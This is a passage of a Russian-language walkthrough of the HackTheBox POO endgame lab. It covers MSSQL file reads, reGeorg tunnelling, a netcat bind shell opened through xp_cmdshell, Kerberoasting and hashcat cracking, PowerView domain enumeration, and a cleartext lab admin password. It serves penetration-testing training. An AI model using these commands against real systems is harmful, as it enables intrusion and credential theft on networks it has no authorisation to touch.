Π‘Π΄Π°Π΅ΠΌ этот Ρ„Π»Π°Π³ ΠΈ ΠΈΠ΄Π΅ΠΌ Π΄Π°Π»Π΅Π΅.

HackTheBox endgame. ΠŸΡ€ΠΎΡ…ΠΎΠΆΠ΄Π΅Π½ΠΈΠ΅ Π»Π°Π±ΠΎΡ€Π°Ρ‚ΠΎΡ€ΠΈΠΈ Professional Offensive Operations. ΠŸΠ΅Π½Ρ‚Π΅ΡΡ‚ Active Directory

BackTrack flag

ΠŸΠΎΠ»ΡƒΡ‡ΠΈΠΌ шСлл с ΠΏΠΎΠΌΠΎΡ‰ΡŒΡŽ MSSQL, я ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΡŽ mssqlclient ΠΈΠ· ΠΏΠ°ΠΊΠ΅Ρ‚Π° impacket.

mssqlclient.py ralf:[email protected] -db POO_PUBLIC

HackTheBox endgame. ΠŸΡ€ΠΎΡ…ΠΎΠΆΠ΄Π΅Π½ΠΈΠ΅ Π»Π°Π±ΠΎΡ€Π°Ρ‚ΠΎΡ€ΠΈΠΈ Professional Offensive Operations. ΠŸΠ΅Π½Ρ‚Π΅ΡΡ‚ Active Directory

Нам Π½ΡƒΠΆΠ½ΠΎ Ρ€Π°Π·Π΄ΠΎΠ±Ρ‹Ρ‚ΡŒ ΠΏΠ°Ρ€ΠΎΠ»ΠΈ, ΠΈ ΠΏΠ΅Ρ€Π²ΠΎΠ΅, Ρ‡Ρ‚ΠΎ ΠΌΡ‹ ΡƒΠΆΠ΅ встрСчали, β€” это сайт. Π’Π°ΠΊΠΈΠΌ ΠΎΠ±Ρ€Π°Π·ΠΎΠΌ Π½Π°ΠΌ Π½ΡƒΠΆΠ΅Π½ ΠΊΠΎΠ½Ρ„ΠΈΠ³ Π²Π΅Π± сСрвСра (Π±Ρ€ΠΎΡΠΈΡ‚ΡŒ ΡƒΠ΄ΠΎΠ±Π½Ρ‹ΠΉ шСлл Π½Π΅ получаСтся, Π²ΠΈΠ΄ΠΈΠΌΠΎ Ρ€Π°Π±ΠΎΡ‚Π°Π΅Ρ‚ firewall).

HackTheBox endgame. ΠŸΡ€ΠΎΡ…ΠΎΠΆΠ΄Π΅Π½ΠΈΠ΅ Π»Π°Π±ΠΎΡ€Π°Ρ‚ΠΎΡ€ΠΈΠΈ Professional Offensive Operations. ΠŸΠ΅Π½Ρ‚Π΅ΡΡ‚ Active Directory

Но доступ Π·Π°ΠΏΡ€Π΅Ρ‰Π΅Π½. Π₯отя ΠΌΡ‹ ΠΌΠΎΠΆΠ΅ΠΌ ΠΏΡ€ΠΎΡ‡ΠΈΡ‚Π°Ρ‚ΡŒ Ρ„Π°ΠΉΠ» ΠΈΠ· MSSQL, Π½ΡƒΠΆΠ½ΠΎ лишь Π·Π½Π°Ρ‚ΡŒ ΠΊΠ°ΠΊΠΈΠ΅ языки программирования настроСны. И Π² Π΄ΠΈΡ€Π΅ΠΊΡ‚ΠΎΡ€ΠΈΠΈ MSSQL ΡƒΠ·Π½Π°Π΅ΠΌ, Ρ‡Ρ‚ΠΎ Π΅ΡΡ‚ΡŒ Python.

HackTheBox endgame. ΠŸΡ€ΠΎΡ…ΠΎΠΆΠ΄Π΅Π½ΠΈΠ΅ Π»Π°Π±ΠΎΡ€Π°Ρ‚ΠΎΡ€ΠΈΠΈ Professional Offensive Operations. ΠŸΠ΅Π½Ρ‚Π΅ΡΡ‚ Active Directory

Π’ΠΎΠ³Π΄Π° ΠΏΡ€ΠΎΡ‡ΠΈΡ‚Π°Ρ‚ΡŒ Ρ„Π°ΠΉΠ» web.config Π½Π΅Ρ‚ Π½ΠΈΠΊΠ°ΠΊΠΈΡ… ΠΏΡ€ΠΎΠ±Π»Π΅ΠΌ.

EXEC sp_execute_external_script
@language = N'Python',
@script = "print(open('C:inetpubwwwrootweb.config').read())"

HackTheBox endgame. ΠŸΡ€ΠΎΡ…ΠΎΠΆΠ΄Π΅Π½ΠΈΠ΅ Π»Π°Π±ΠΎΡ€Π°Ρ‚ΠΎΡ€ΠΈΠΈ Professional Offensive Operations. ΠŸΠ΅Π½Ρ‚Π΅ΡΡ‚ Active Directory

Π‘ Π½Π°ΠΉΠ΄Π΅Π½Π½Ρ‹ΠΌΠΈ ΡƒΡ‡Π΅Ρ‚Π½Ρ‹ΠΌΠΈ Π΄Π°Π½Π½Ρ‹ΠΌΠΈ Π·Π°ΠΉΠ΄Π΅ΠΌ Π½Π° /admin ΠΈ Π·Π°Π±ΠΈΡ€Π°Π΅ΠΌ Ρ„Π»Π°Π³.

HackTheBox endgame. ΠŸΡ€ΠΎΡ…ΠΎΠΆΠ΄Π΅Π½ΠΈΠ΅ Π»Π°Π±ΠΎΡ€Π°Ρ‚ΠΎΡ€ΠΈΠΈ Professional Offensive Operations. ΠŸΠ΅Π½Ρ‚Π΅ΡΡ‚ Active Directory

HackTheBox endgame. ΠŸΡ€ΠΎΡ…ΠΎΠΆΠ΄Π΅Π½ΠΈΠ΅ Π»Π°Π±ΠΎΡ€Π°Ρ‚ΠΎΡ€ΠΈΠΈ Professional Offensive Operations. ΠŸΠ΅Π½Ρ‚Π΅ΡΡ‚ Active Directory

Foothold flag

На самом Π΄Π΅Π»Π΅ ΠΎΡ‚ использования Ρ„Π°ΠΉΠ΅Ρ€Π²ΠΎΠ»Π° Π΅ΡΡ‚ΡŒ Π½Π΅ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Π΅ нСудобства, Π½ΠΎ просматривая настройки сСти, Π·Π°ΠΌΠ΅Ρ‡Π°Π΅ΠΌ, Ρ‡Ρ‚ΠΎ Ρ‚Π°ΠΊΠΆΠ΅ ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΠ΅Ρ‚ΡΡ ΠΏΡ€ΠΎΠΊΠΎΠ» IPv6!

HackTheBox endgame. ΠŸΡ€ΠΎΡ…ΠΎΠΆΠ΄Π΅Π½ΠΈΠ΅ Π»Π°Π±ΠΎΡ€Π°Ρ‚ΠΎΡ€ΠΈΠΈ Professional Offensive Operations. ΠŸΠ΅Π½Ρ‚Π΅ΡΡ‚ Active Directory

Π”ΠΎΠ±Π°Π²ΠΈΠΌ Π΄Π°Π½Π½Ρ‹ΠΉ адрСс Π² /etc/hosts.
dead:babe::1001 poo6.htb
Π”Π°Π²Π°ΠΉΡ‚Π΅ снова просканируСм хост, Π½ΠΎ ΡƒΠΆΠ΅ ΠΏΠΎ ΠΏΡ€ΠΎΡ‚ΠΎΠΊΠΎΠ»Ρƒ IPv6.

HackTheBox endgame. ΠŸΡ€ΠΎΡ…ΠΎΠΆΠ΄Π΅Π½ΠΈΠ΅ Π»Π°Π±ΠΎΡ€Π°Ρ‚ΠΎΡ€ΠΈΠΈ Professional Offensive Operations. ΠŸΠ΅Π½Ρ‚Π΅ΡΡ‚ Active Directory

И ΠΏΠΎ IPv6 доступна слуТба WinRM. ΠŸΠΎΠ΄ΠΊΠ»ΡŽΡ‡ΠΈΠΌΡΡ с Π½Π°ΠΉΠ΄Π΅Π½Π½Ρ‹ΠΌΠΈ ΡƒΡ‡Π΅Ρ‚Π½Ρ‹ΠΌΠΈ Π΄Π°Π½Π½Ρ‹ΠΌΠΈ.

HackTheBox endgame. ΠŸΡ€ΠΎΡ…ΠΎΠΆΠ΄Π΅Π½ΠΈΠ΅ Π»Π°Π±ΠΎΡ€Π°Ρ‚ΠΎΡ€ΠΈΠΈ Professional Offensive Operations. ΠŸΠ΅Π½Ρ‚Π΅ΡΡ‚ Active Directory

На Ρ€Π°Π±ΠΎΡ‡Π΅ΠΌ столС Π΅ΡΡ‚ΡŒ Ρ„Π»Π°Π³, сдаСм Π΅Π³ΠΎ.

HackTheBox endgame. ΠŸΡ€ΠΎΡ…ΠΎΠΆΠ΄Π΅Π½ΠΈΠ΅ Π»Π°Π±ΠΎΡ€Π°Ρ‚ΠΎΡ€ΠΈΠΈ Professional Offensive Operations. ΠŸΠ΅Π½Ρ‚Π΅ΡΡ‚ Active Directory

P00ned flag

ΠŸΡ€ΠΎΠ²Π΅Π΄Ρ Ρ€Π°Π·Π²Π΅Π΄ΠΊΡƒ Π½Π° хостС с ΠΏΠΎΠΌΠΎΡ‰ΡŒΡŽ winpeas Π½ΠΈΡ‡Π΅Π³ΠΎ особСнного Π½Π΅ Π½Π°Ρ…ΠΎΠ΄ΠΈΠΌ. Π’ΠΎΠ³Π΄Π° Π±Ρ‹Π»ΠΎ принято Ρ€Π΅ΡˆΠ΅Π½ΠΈΠ΅ снова ΠΈΡΠΊΠ°Ρ‚ΡŒ ΡƒΡ‡Π΅Ρ‚Π½Ρ‹Π΅ Π΄Π°Π½Π½Ρ‹Π΅ (Π½Π° эту Ρ‚Π΅ΠΌΡƒ я Ρ‚ΠΎΠΆΠ΅ писал ΡΡ‚Π°Ρ‚ΡŒΡŽ). Но ΠΏΠΎΠ»ΡƒΡ‡ΠΈΡ‚ΡŒ всС SPN ΠΈΠ· систСмы Ρ‡Π΅Ρ€Π΅Π· WinRM Ρƒ мСня Π½Π΅ Π²Ρ‹ΡˆΠ»ΠΎ.

setspn.exe -T intranet.poo -Q */*

HackTheBox endgame. ΠŸΡ€ΠΎΡ…ΠΎΠΆΠ΄Π΅Π½ΠΈΠ΅ Π»Π°Π±ΠΎΡ€Π°Ρ‚ΠΎΡ€ΠΈΠΈ Professional Offensive Operations. ΠŸΠ΅Π½Ρ‚Π΅ΡΡ‚ Active Directory

Π”Π°Π²Π°ΠΉΡ‚Π΅ Π²Ρ‹ΠΏΠΎΠ»Π½ΠΈΠΌ ΠΊΠΎΠΌΠ°Π½Π΄Ρƒ Ρ‡Π΅Ρ€Π΅Π· MSSQL.

HackTheBox endgame. ΠŸΡ€ΠΎΡ…ΠΎΠΆΠ΄Π΅Π½ΠΈΠ΅ Π»Π°Π±ΠΎΡ€Π°Ρ‚ΠΎΡ€ΠΈΠΈ Professional Offensive Operations. ΠŸΠ΅Π½Ρ‚Π΅ΡΡ‚ Active Directory

Π£ΠΊΠ°Π·Π°Π½Π½Ρ‹ΠΌ способом ΠΌΡ‹ ΠΏΠΎΠ»ΡƒΡ‡Π°Π΅ΠΌ SPN ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»Π΅ΠΉ p00_hr ΠΈ p00_adm, Π° это ΠΎΠ·Π½Π°Ρ‡Π°Π΅Ρ‚, Ρ‡Ρ‚ΠΎ ΠΎΠ½ΠΈ уязвим ΠΊ Ρ‚Π°ΠΊΠΎΠΉ Π°Ρ‚Π°ΠΊΠ΅, ΠΊΠ°ΠΊ Kerberoasting. Если Π²ΠΊΡ€Π°Ρ‚Ρ†Π΅, Ρ‚ΠΎ ΠΌΡ‹ ΠΌΠΎΠΆΠ΅ΠΌ ΠΏΠΎΠ»ΡƒΡ‡ΠΈΡ‚ΡŒ Ρ…Π΅ΡˆΠΈ ΠΈΡ… ΠΏΠ°Ρ€ΠΎΠ»Π΅ΠΉ.

Для Π½Π°Ρ‡Π°Π»Π° Π½ΡƒΠΆΠ½ΠΎ ΠΏΠΎΠ»ΡƒΡ‡ΠΈΡ‚ΡŒ ΡΡ‚Π°Π±ΠΈΠ»ΡŒΠ½Ρ‹ΠΉ шСлл ΠΎΡ‚ ΠΈΠΌΠ΅Π½ΠΈ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»Ρ MSSQL. Но Ρ‚Π°ΠΊ ΠΊΠ°ΠΊ нас ΠΎΠ³Ρ€Π°Π½ΠΈΡ‡ΠΈΠ²Π°ΡŽΡ‚ Π² доступС, Ρ‚ΠΎ ΠΌΡ‹ ΠΈΠΌΠ΅Π΅ΠΌ связь с хостом Ρ‚ΠΎΠ»ΡŒΠΊΠΎ Ρ‡Π΅Ρ€Π΅Π· 80 ΠΈ 1433 ΠΏΠΎΡ€Ρ‚. Но Π΅ΡΡ‚ΡŒ Π²ΠΎΠ·ΠΌΠΎΠΆΠ½ΠΎΡΡ‚ΡŒ туннСлирования Ρ‚Ρ€Π°Ρ„ΠΈΠΊΠ° Ρ‡Π΅Ρ€Π΅Π· 80 ΠΏΠΎΡ€Ρ‚! Для этого Π²ΠΎΡΠΏΠΎΠ»ΡŒΠ·ΡƒΠ΅ΠΌΡΡ ΡΠ»Π΅Π΄ΡƒΡŽΡ‰ΠΈΠΌ ΠΏΡ€ΠΈΠ»ΠΎΠΆΠ΅Π½ΠΈΠ΅ΠΌ. Π—Π°Π³Ρ€ΡƒΠ·ΠΈΠΌ Ρ„Π°ΠΉΠ» tunnel.aspx Π² домашнюю Π΄ΠΈΡ€Π΅ΠΊΡ‚ΠΎΡ€ΠΈΡŽ Π²Π΅Π± сСрвСра β€” C:inetpubwwwroot.

HackTheBox endgame. ΠŸΡ€ΠΎΡ…ΠΎΠΆΠ΄Π΅Π½ΠΈΠ΅ Π»Π°Π±ΠΎΡ€Π°Ρ‚ΠΎΡ€ΠΈΠΈ Professional Offensive Operations. ΠŸΠ΅Π½Ρ‚Π΅ΡΡ‚ Active Directory

Но ΠΏΡ€ΠΈ ΠΏΠΎΠΏΡ‹Ρ‚ΠΊΠ΅ ΠΎΠ±Ρ€Π°Ρ‚ΠΈΡ‚ΡŒΡΡ ΠΊ Π½Π΅ΠΌΡƒ ΠΏΠΎΠ»ΡƒΡ‡Π°Π΅ΠΌ ΠΎΡˆΠΈΠ±ΠΊΡƒ 404. Π­Ρ‚ΠΎ ΠΎΠ·Π½Π°Ρ‡Π°Π΅Ρ‚, Ρ‡Ρ‚ΠΎ Ρ„Π°ΠΉΠ»Ρ‹ *.aspx Π½Π΅ Π²Ρ‹ΠΏΠΎΠ»Π½ΡΡŽΡ‚ΡΡ. Π§Ρ‚ΠΎΠ±Ρ‹ Ρ„Π°ΠΉΠ»Ρ‹ с Π΄Π°Π½Π½Ρ‹ΠΌ Ρ€Π°ΡΡˆΠΈΡ€Π΅Π½ΠΈΡΠΌ стали Π²Ρ‹ΠΏΠΎΠ»Π½ΡΡ‚ΡŒΡΡ, установим ASP.NET 4.5 ΡΠ»Π΅Π΄ΡƒΡŽΡ‰ΠΈΠΌ ΠΎΠ±Ρ€Π°Π·ΠΎΠΌ.

dism /online /enable-feature /all /featurename:IIS-ASPNET45

HackTheBox endgame. ΠŸΡ€ΠΎΡ…ΠΎΠΆΠ΄Π΅Π½ΠΈΠ΅ Π»Π°Π±ΠΎΡ€Π°Ρ‚ΠΎΡ€ΠΈΠΈ Professional Offensive Operations. ΠŸΠ΅Π½Ρ‚Π΅ΡΡ‚ Active Directory

HackTheBox endgame. ΠŸΡ€ΠΎΡ…ΠΎΠΆΠ΄Π΅Π½ΠΈΠ΅ Π»Π°Π±ΠΎΡ€Π°Ρ‚ΠΎΡ€ΠΈΠΈ Professional Offensive Operations. ΠŸΠ΅Π½Ρ‚Π΅ΡΡ‚ Active Directory

И Ρ‚Π΅ΠΏΠ΅Ρ€ΡŒ ΠΏΡ€ΠΈ ΠΎΠ±Ρ€Π°Ρ‰Π΅Π½ΠΈΠΈ ΠΊ tunnel.aspx ΠΏΠΎΠ»ΡƒΡ‡Π°Π΅ΠΌ ΠΎΡ‚Π²Π΅Ρ‚, Ρ‡Ρ‚ΠΎ всС Π³ΠΎΡ‚ΠΎΠ²ΠΎ ΠΊ Ρ€Π°Π±ΠΎΡ‚Π΅.

HackTheBox endgame. ΠŸΡ€ΠΎΡ…ΠΎΠΆΠ΄Π΅Π½ΠΈΠ΅ Π»Π°Π±ΠΎΡ€Π°Ρ‚ΠΎΡ€ΠΈΠΈ Professional Offensive Operations. ΠŸΠ΅Π½Ρ‚Π΅ΡΡ‚ Active Directory

Π”Π°Π²Π°ΠΉΡ‚Π΅ запустим ΠΊΠ»ΠΈΠ΅Π½Ρ‚ΡΠΊΡƒΡŽ Ρ‡Π°ΡΡ‚ΡŒ прилоТСния, которая Π±ΡƒΠ΄Π΅Ρ‚ Π·Π°Π½ΠΈΠΌΠ°Ρ‚ΡŒΡΡ рСтранслированиСм Ρ‚Ρ€Π°Ρ„ΠΈΠΊΠ°. ΠœΡ‹ Π±ΡƒΠ΄Π΅ΠΌ ΠΏΠ΅Ρ€Π΅Π½Π°ΠΏΡ€Π°Π²Π»ΡΡ‚ΡŒ вСсь Ρ‚Ρ€Π°Ρ„ΠΈΠΊ с 5432 ΠΏΠΎΡ€Ρ‚Π° Π½Π° сСрвСр.

python ./reGeorgSocksProxy.py -p 5432 -u http://poo.htb/tunnel.aspx

HackTheBox endgame. ΠŸΡ€ΠΎΡ…ΠΎΠΆΠ΄Π΅Π½ΠΈΠ΅ Π»Π°Π±ΠΎΡ€Π°Ρ‚ΠΎΡ€ΠΈΠΈ Professional Offensive Operations. ΠŸΠ΅Π½Ρ‚Π΅ΡΡ‚ Active Directory

И ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΠ΅ΠΌ proxychains, Ρ‡Ρ‚ΠΎΠ±Ρ‹ ΡΠ»Π°Ρ‚ΡŒ Ρ‚Ρ€Π°Ρ„ΠΈΠΊ любого прилоТСния Ρ‡Π΅Ρ€Π΅Π· наш прокси. Π”ΠΎΠ±Π°Π²ΠΈΠΌ Π΄Π°Π½Π½Ρ‹ΠΉ прокси Π² Ρ„Π°ΠΉΠ» ΠΊΠΎΠ½Ρ„ΠΈΠ³ΡƒΡ€Π°Ρ†ΠΈΠΈ /etc/proxychains.conf.

HackTheBox endgame. ΠŸΡ€ΠΎΡ…ΠΎΠΆΠ΄Π΅Π½ΠΈΠ΅ Π»Π°Π±ΠΎΡ€Π°Ρ‚ΠΎΡ€ΠΈΠΈ Professional Offensive Operations. ΠŸΠ΅Π½Ρ‚Π΅ΡΡ‚ Active Directory

Π’Π΅ΠΏΠ΅Ρ€ΡŒ Π·Π°Π³Ρ€ΡƒΠ·ΠΈΠΌ Π½Π° сСрвСр ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΡƒ netcat, с ΠΏΠΎΠΌΠΎΡ‰ΡŒΡŽ ΠΊΠΎΡ‚ΠΎΡ€ΠΎΠΉ сдСлаСм ΡΡ‚Π°Π±ΠΈΠ»ΡŒΠ½Ρ‹ΠΉ bind шСлл, ΠΈ скрипт Invoke-Kerberoast, c ΠΏΠΎΠΌΠΎΡ‰ΡŒΡŽ ΠΊΠΎΡ‚ΠΎΡ€ΠΎΠ³ΠΎ Π²Ρ‹ΠΏΠΎΠ»Π½ΠΈΠΌ Π°Ρ‚Π°ΠΊΡƒ Kerberoasting.

HackTheBox endgame. ΠŸΡ€ΠΎΡ…ΠΎΠΆΠ΄Π΅Π½ΠΈΠ΅ Π»Π°Π±ΠΎΡ€Π°Ρ‚ΠΎΡ€ΠΈΠΈ Professional Offensive Operations. ΠŸΠ΅Π½Ρ‚Π΅ΡΡ‚ Active Directory

Π’Π΅ΠΏΠ΅Ρ€ΡŒ Ρ‡Π΅Ρ€Π΅Π· MSSQL запускаСм листСнСр.

xp_cmdshell C:tempnc64.exe -e powershell.exe -lvp 4321

HackTheBox endgame. ΠŸΡ€ΠΎΡ…ΠΎΠΆΠ΄Π΅Π½ΠΈΠ΅ Π»Π°Π±ΠΎΡ€Π°Ρ‚ΠΎΡ€ΠΈΠΈ Professional Offensive Operations. ΠŸΠ΅Π½Ρ‚Π΅ΡΡ‚ Active Directory

И ΠΏΠΎΠ΄ΠΊΠ»ΡŽΡ‡Π°Π΅ΠΌΡΡ Ρ‡Π΅Ρ€Π΅Π· наш прокси.

proxychains rlwrap nc poo.htb 4321

HackTheBox endgame. ΠŸΡ€ΠΎΡ…ΠΎΠΆΠ΄Π΅Π½ΠΈΠ΅ Π»Π°Π±ΠΎΡ€Π°Ρ‚ΠΎΡ€ΠΈΠΈ Professional Offensive Operations. ΠŸΠ΅Π½Ρ‚Π΅ΡΡ‚ Active Directory

И Π΄Π°Π²Π°ΠΉΡ‚Π΅ ΠΏΠΎΠ»ΡƒΡ‡ΠΈΠΌ Ρ…Π΅ΡˆΠΈ.

. .Invoke-Kerberoast.ps1
Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat | Select-Object Hash | Out-File -filepath 'C:tempkerb_hashes.txt' -Width 8000
type kerb_hashes.txt

HackTheBox endgame. ΠŸΡ€ΠΎΡ…ΠΎΠΆΠ΄Π΅Π½ΠΈΠ΅ Π»Π°Π±ΠΎΡ€Π°Ρ‚ΠΎΡ€ΠΈΠΈ Professional Offensive Operations. ΠŸΠ΅Π½Ρ‚Π΅ΡΡ‚ Active Directory

Π”Π°Π»Π΅Π΅ Π½ΡƒΠΆΠ½ΠΎ ΠΏΠ΅Ρ€Π΅Π±Ρ€Π°Ρ‚ΡŒ эти Ρ…Π΅ΡˆΠΈ. Π’Π°ΠΊ ΠΊΠ°ΠΊ Π² rockyou словарС Π΄Π°Π½Π½Ρ‹Ρ… ΠΏΠ°Ρ€ΠΎΠ»Π΅ΠΉ Π½Π΅ Π±Ρ‹Π»ΠΎ, Ρ‚ΠΎ я использовал Π’Π‘Π• словари passwords, прСдоставлСнныС Π² Seclists. Для ΠΏΠ΅Ρ€Π΅Π±ΠΎΡ€Π° ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΠ΅ΠΌ hashcat.

hashcat -a 0 -m 13100 krb_hashes.txt /usr/share/seclists/Passwords/*.txt --force

И Π½Π°Ρ…ΠΎΠ΄ΠΈΠΌ ΠΎΠ±Π° пароля, ΠΏΠ΅Ρ€Π²Ρ‹ΠΉ Π² словарС dutch_passwordlist.txt, Π° Π²Ρ‚ΠΎΡ€ΠΎΠΉ Π² Keyboard-Combinations.txt.

HackTheBox endgame. ΠŸΡ€ΠΎΡ…ΠΎΠΆΠ΄Π΅Π½ΠΈΠ΅ Π»Π°Π±ΠΎΡ€Π°Ρ‚ΠΎΡ€ΠΈΠΈ Professional Offensive Operations. ΠŸΠ΅Π½Ρ‚Π΅ΡΡ‚ Active Directory

HackTheBox endgame. ΠŸΡ€ΠΎΡ…ΠΎΠΆΠ΄Π΅Π½ΠΈΠ΅ Π»Π°Π±ΠΎΡ€Π°Ρ‚ΠΎΡ€ΠΈΠΈ Professional Offensive Operations. ΠŸΠ΅Π½Ρ‚Π΅ΡΡ‚ Active Directory

И Ρ‚Π°ΠΊ Ρƒ нас Π΅ΡΡ‚ΡŒ Ρ‚Ρ€ΠΈ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»Ρ, ΠΈΠ΄Π΅ΠΌ Π½Π° ΠΊΠΎΠ½Ρ‚Ρ€ΠΎΠ»Π»Π΅Ρ€ Π΄ΠΎΠΌΠ΅Π½Π°. Π‘Π½Π°Ρ‡Π°Π»Π° ΡƒΠ·Π½Π°Π΅ΠΌ Π΅Π³ΠΎ адрСс.

HackTheBox endgame. ΠŸΡ€ΠΎΡ…ΠΎΠΆΠ΄Π΅Π½ΠΈΠ΅ Π»Π°Π±ΠΎΡ€Π°Ρ‚ΠΎΡ€ΠΈΠΈ Professional Offensive Operations. ΠŸΠ΅Π½Ρ‚Π΅ΡΡ‚ Active Directory

ΠžΡ‚Π»ΠΈΡ‡Π½ΠΎ, ΠΌΡ‹ ΡƒΠ·Π½Π°Π»ΠΈ IP адрСс ΠΊΠΎΠ½Ρ‚Ρ€ΠΎΠ»Π»Π΅Ρ€Π° Π΄ΠΎΠΌΠ΅Π½Π°. Π”Π°Π²Π°ΠΉΡ‚Π΅ ΡƒΠ·Π½Π°Π΅ΠΌ всСх ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»Π΅ΠΉ Π΄ΠΎΠΌΠ΅Π½Π°, Π° Ρ‚Π°ΠΊΠΆΠ΅ ΠΊΡ‚ΠΎ ΠΈΠ· Π½ΠΈΡ… являСтся администратором. Для Π·Π°Π³Ρ€ΡƒΠ·ΠΈΠΌ скрипт для получСния ΠΈΠ½Ρ„ΠΎΡ€ΠΌΠ°Ρ†ΠΈΠΈ PowerView.ps1. ΠŸΠΎΡ‚ΠΎΠΌ ΠΏΠΎΠ΄ΠΊΠ»ΡŽΡ‡ΠΈΠΌΡΡ с ΠΏΠΎΠΌΠΎΡ‰ΡŒΡŽ evil-winrm, ΡƒΠΊΠ°Π·Π°Π² Π² ΠΏΠ°Ρ€Π°ΠΌΠ΅Ρ‚Ρ€Π΅ -s Π΄ΠΈΡ€Π΅ΠΊΡ‚ΠΎΡ€ΠΈΡŽ со скриптом. А ΠΏΠΎΡ‚ΠΎΠΌ просто Π·Π°Π³Ρ€ΡƒΠ·ΠΈΠΌ скрипт PowerView.

HackTheBox endgame. ΠŸΡ€ΠΎΡ…ΠΎΠΆΠ΄Π΅Π½ΠΈΠ΅ Π»Π°Π±ΠΎΡ€Π°Ρ‚ΠΎΡ€ΠΈΠΈ Professional Offensive Operations. ΠŸΠ΅Π½Ρ‚Π΅ΡΡ‚ Active Directory

Π’Π΅ΠΏΠ΅Ρ€ΡŒ Π½Π°ΠΌ доступны всС Π΅Π³ΠΎ Ρ„ΡƒΠ½ΠΊΡ†ΠΈΠΈ. ΠŸΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»ΡŒ p00_adm ΠΏΠΎΡ…ΠΎΠΆ Π½Π° ΠΏΡ€ΠΈΠ²ΠΈΠ»Π΅Π³ΠΈΡ€ΠΎΠ²Π°Π½Π½ΠΎΠ³ΠΎ, поэтому Π±ΡƒΠ΄Π΅ΠΌ Ρ€Π°Π±ΠΎΡ‚Π°Ρ‚ΡŒ Π² Π΅Π³ΠΎ контСкстС. Π‘ΠΎΠ·Π΄Π°Π΄ΠΈΠΌ ΠΎΠ±ΡŠΠ΅ΠΊΡ‚ PSCredential для этого ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»Ρ.

$User = 'p00_adm'
$Password = 'ZQ!5t4r'
$Cpass = ConvertTo-SecureString -AsPlainText $Password -force
$Creds = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$Cpass

Π’Π΅ΠΏΠ΅Ρ€ΡŒ всС ΠΊΠΎΠΌΠ°Π½Π΄Ρ‹ Powershell, Π³Π΄Π΅ ΠΌΡ‹ ΡƒΠΊΠ°ΠΆΠ΅ΠΌ Creds, Π±ΡƒΠ΄ΡƒΡ‚ Π²Ρ‹ΠΏΠΎΠ»Π½Π΅Π½Ρ‹ ΠΎΡ‚ ΠΈΠΌΠ΅Π½ΠΈ p00_adm. Π”Π°Π²Π°ΠΉΡ‚Π΅ Π²Ρ‹Π²Π΅Π΄Π΅ΠΌ список ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»Π΅ΠΉ ΠΈ Π°Ρ‚Ρ€ΠΈΠ±ΡƒΡ‚ AdminCount.

Get-NetUser -DomainController dc -Credential $Creds | select name,admincount

HackTheBox endgame. ΠŸΡ€ΠΎΡ…ΠΎΠΆΠ΄Π΅Π½ΠΈΠ΅ Π»Π°Π±ΠΎΡ€Π°Ρ‚ΠΎΡ€ΠΈΠΈ Professional Offensive Operations. ΠŸΠ΅Π½Ρ‚Π΅ΡΡ‚ Active Directory

И Ρ‚Π°ΠΊ, наш ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»ΡŒ Ρ€Π΅Π°Π»ΡŒΠ½ΠΎ являСтся ΠΏΡ€ΠΈΠ²ΠΈΠ»Π΅Π³ΠΈΡ€ΠΎΠ²Π°Π½Π½Ρ‹ΠΌ. Π”Π°Π²Π°ΠΉΡ‚Π΅ глянСм, Π² ΠΊΠ°ΠΊΠΈΡ… Π³Ρ€ΡƒΠΏΠΏΠ°Ρ… ΠΎΠ½ состоит.

Get-NetGroup -UserName "p00_adm" -DomainController dc -Credential $Creds

HackTheBox endgame. ΠŸΡ€ΠΎΡ…ΠΎΠΆΠ΄Π΅Π½ΠΈΠ΅ Π»Π°Π±ΠΎΡ€Π°Ρ‚ΠΎΡ€ΠΈΠΈ Professional Offensive Operations. ΠŸΠ΅Π½Ρ‚Π΅ΡΡ‚ Active Directory

ΠžΠΊΠΎΠ½Ρ‡Π°Ρ‚Π΅Π»ΡŒΠ½ΠΎ утвСрТдаСмся, Ρ‡Ρ‚ΠΎ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»ΡŒ являСтся администратором Π΄ΠΎΠΌΠ΅Π½Π°. Π­Ρ‚ΠΎ Π΄Π°Π΅Ρ‚ Π΅ΠΌΡƒ ΠΏΡ€Π°Π²ΠΎ ΡƒΠ΄Π°Π»Π΅Π½Π½ΠΎΠ³ΠΎ Π²Ρ…ΠΎΠ΄Π° Π½Π° ΠΊΠΎΠ½Ρ‚Ρ€ΠΎΠ»Π»Π΅Ρ€ Π΄ΠΎΠΌΠ΅Π½Π°. Π”Π°Π²Π°ΠΉΡ‚Π΅ ΠΏΠΎΠΏΡ€ΠΎΠ±ΡƒΠ΅ΠΌ Π²ΠΎΠΉΡ‚ΠΈ Ρ‡Π΅Ρ€Π΅Π· WinRM, ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΡ наш Ρ‚ΡƒΠ½Π½Π΅Π»ΡŒ. МСня смутили ошибки, Π²Ρ‹Π΄Π°Π²Π°Π΅ΠΌΡ‹Π΅ reGeorg’ом ΠΏΡ€ΠΈ использовании evil-winrm.

HackTheBox endgame. ΠŸΡ€ΠΎΡ…ΠΎΠΆΠ΄Π΅Π½ΠΈΠ΅ Π»Π°Π±ΠΎΡ€Π°Ρ‚ΠΎΡ€ΠΈΠΈ Professional Offensive Operations. ΠŸΠ΅Π½Ρ‚Π΅ΡΡ‚ Active Directory

